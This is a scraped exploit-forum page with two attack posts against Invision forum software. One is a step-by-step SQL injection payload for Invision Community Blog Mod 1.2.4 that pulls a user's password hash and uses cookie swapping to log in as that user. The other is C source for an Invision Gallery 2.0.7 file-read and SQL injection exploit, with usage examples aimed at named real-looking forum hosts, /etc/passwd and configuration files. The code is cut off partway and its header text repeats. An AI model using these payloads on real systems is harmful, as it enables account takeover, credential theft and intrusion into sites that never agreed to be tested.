Black_hat_cr(HCE) Invision Community Blog Mod 1.2.4 SQL Injection Vulnerability Code: 1. Open any blog entry 2. Try to reply to any message 3. Push "Preview message" button (Do not post your reply) 4. Save source code of opened page to your PC 5. Find this string <input type='hidden' name='eid' value='<BLOG_ENTRY_ID>' /> 6. Change <BLOG_ENTRY_ID> with this SQL Injection: <BLOG_ENTRY_ID> UNION SELECT b.entry_id, b.blog_id, b.category_id, b.entry_author_id, b.entry_author_name, b.entry_date, member_login_key, b.entry_category, b.entry, b.entry_status, b.entry_locked, b.entry_num_comments, b.entry_last_comment, b.entry_last_comment_date, b.entry_last_comment_name, b.entry_last_comment_mid, b.entry_queued_comments, b.entry_has_attach, b.entry_post_key, b.entry_edit_time, b.entry_edit_name, b.entry_html_state, b.entry_use_emo, b.entry_trackbacks, b.entry_sent_trackbacks, b.entry_last_update, b.entry_gallery_album, b.entry_poll_state, b.entry_last_vote FROM ibf_members, ipb_blog_entries b WHERE id=<USER_ID> and b.entry_id=<BLOG_ENTRY_ID> LIMIT 1,1 <USER_ID> - ID of the user whom password you want to get. 7. Push "Preview Button" again. 8. After refresh instead of blog entry name you will get users's HASH password. 9. Change your cookies in your favorite browser and open board. You will be automaticaly logged in as the user whom password you just got. Black_hat_cr(HCE) Invision Gallery <= 2.0.7 ReadFile() & SQL Injection Exploit (linux) Code: /* _ _ _ _ _ __ _ _ _ | || |___| | | |/ /_ _ (_)__ _| |_| |_ ___ | __ / -_) | | ' <| ' \| / _` | ' \ _(_-< |_||_\___|_|_|_|\_\_||_|_\__, |_||_\__/__/ hellknights.void.ru |___/ (c)oded by _1nf3ct0r_ (Windows), ported by ShadOS(Linux) Invision Gallery => 2.0.7 ReadFile() & SQL injection exploit + + | Uzage: | + + [+] ReadFile(): - syntax: readfile 1 <host> <pathtoindex> <localfile> readfile 2 <host> <pathtoindex> <localfile> // try it if readfile[1] failed ;) - params: <localfile> - path to local file ( /file), for example: / / / / /etc/passwd s0, if u want to get local path to IPB try this: / /hellknightscrewxploit :) - examples: readfile 1 asd.ru index.php / / / / / /etc/passwd readfile 1 asd.ru forum/index.php / /conf_global.php readfile 1 asd.ru forum/index.php / /conf_global.php%00 [+] SQL-injection: - syntax sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table> getprefix <host> <pathtoindex> // get database prefix from IPB error :) - params: <member_id> - member's id for SQL-injection result, for example: 1 <column> - ipb members' column to get. for example: ip_adress, email. <table> - ipb table to use. for example: member <prefix> - database prefix. - examples: ig.exe sqlinject asd.ru index.php legacy_password ibf_ members 1 ig.exe sqlinject asd.ru index.php member_login_key ibf_ members 1 ig.exe sqlinject asd.ru forum/index.php ip_adress ibf_ member 5 [~] sorry, but i`m too lazy 2 optimize this c0de [~] Music: Orbital - Halcyon and On and On (OST Hackers) :) [~] compiled with LCC(Windows), gcc 4.1.1(Linux) without any warnings Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS-Team itz public c0de n0w, have phun :> ./ig sqlinject linuxforum.ru index.php member_login_key ibf_ members 1 ./ig readfile 2 .ru index.php / / / / / / / / /etc/passwd ./ig sqlinject forum.pesni.ru index.php member_login_key ibf_ members 1 */ #include <stdlib.h> #include <stdarg.h> #include <stdio.h> #include <string.h> #include <sys/socket.h> #include <sys/types.h> #include <netinet/in.h> #include <arpa/inet.h> #include <resolv.h> #include <errno.h> #include <netdb.h> #define MAXBUF 1024 int Exploit(char * sendbuffer, char * mode, char * host) { char recvbuffer[10024]; memset(recvbuffer,0,10024); char * temp; struct hostent *hostname; int s; if ((s = socket(AF_INET,SOCK_STREAM,0)) < 0) return -1; struct sockaddr_in webaddr; bzero(&webaddr, sizeof(webaddr)); webaddr.sin_family = AF_INET; webaddr.sin_port = htons(80); hostname = gethostbyname(host); if (hostname) { memcpy(&webaddr.sin_addr, hostname->h_addr, hostname->h_length); } else { return 1; } if (connect(s, (struct sockaddr *)&webaddr,sizeof(webaddr))) return -1; send(s, sendbuffer, strlen(sendbuffer),0); int i, j; while(i = recv(s,recvbuffer+strlen(recvbuffer),1,0)) for(i = 0; recvbuffer[i]!=0; ++i) { if((recvbuffer[i]=='\r')&&(recvbuffer[i+1]=='\n')&& (recvbuffer[i+2]=='\r')&&(recvbuffer[i+3]=='\n')) {temp = (char*)&recvbuffer[i] + 4;break;} } if(strcmp(mode,"readfile")==0) { printf("\n [+] Exploit Result:\n\n%s", temp); return 0; } if(strcmp(mode,"sqlinject")==0) { char * token = NULL; char * injected = NULL; char * parse = NULL; token = strtok(temp, "="); token = strtok(NULL, "="); token = strtok(NULL, "&"); token = strtok(NULL, "&"); for(j = 0; j < 2; j++) { token = strtok(NULL, "&"); if(j==1){ injected = token; printf("\n [+] Exploit Result:\n\n%s", injected); } } } else { printf("\n[-] some error. change MODE param\n"); return 0; } close(s); return 0; } int main(int argc,char * argv[]) { printf("\n \n"); printf(" Invision Gallery 2.0.7 ReadFile() & SQL injection exploit \n"); printf(" (c)oded by _1nf3ct0r_ // Hell Knights Crew \n"); printf(" ported by ShadOS(Linux) // Hell Knights Crew \n"); printf(" http://hellknights.void.ru/ \n"); printf(" Gr33tz: blackybr, 1dt.w0lf, ShadOS, ZaCo, SkvoznoY, HATS- Team \n"); printf(" \n"); if (argc == 1) { printf("\n\n [+] ReadFile():\n"); printf(" - syntax:\n"); printf(" readfile 1 <host> <pathtoindex> <localfile> \n"); printf(" readfile 2 <host> <pathtoindex> <localfile> try it 1f readfile[1] failed \n"); printf(" - params: \n"); printf(" <localfile> - path to local file ( /file), f0r example: / / / / /etc/passwd\n"); printf(" s0, 1f u want to get local path to IPB 7ry th1s: / /hellknightscrewxploit \n"); printf(" - examples:\n"); printf(" readfile 1 asd.ru index.php / / / / / /etc/passwd\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php\n"); printf(" readfile 1 asd.ru forum/index.php / /conf_global.php%00\n\n\n"); printf(" [+] SQL-injection:\n"); printf(" - syntax\n"); printf(" sqlinject <host> <pathtoindex> <member_id> <prefix> <column> <table>\n"); printf(" getprefix <host> <pathtoindex> get database prefix from IPB error \n"); printf(" - params:\n"); printf(" <member_id> - member's id for SQL-injection result, for example: 1\n"); . [~] sorry, but i`m too lazy 2 optimize this c0de [~] Music: Orbital - Halcyon and On and On (OST Hackers) :) [~] compiled with LCC(Windows), gcc 4.1.1(Linux) without any warnings Gr33tz: blackybr,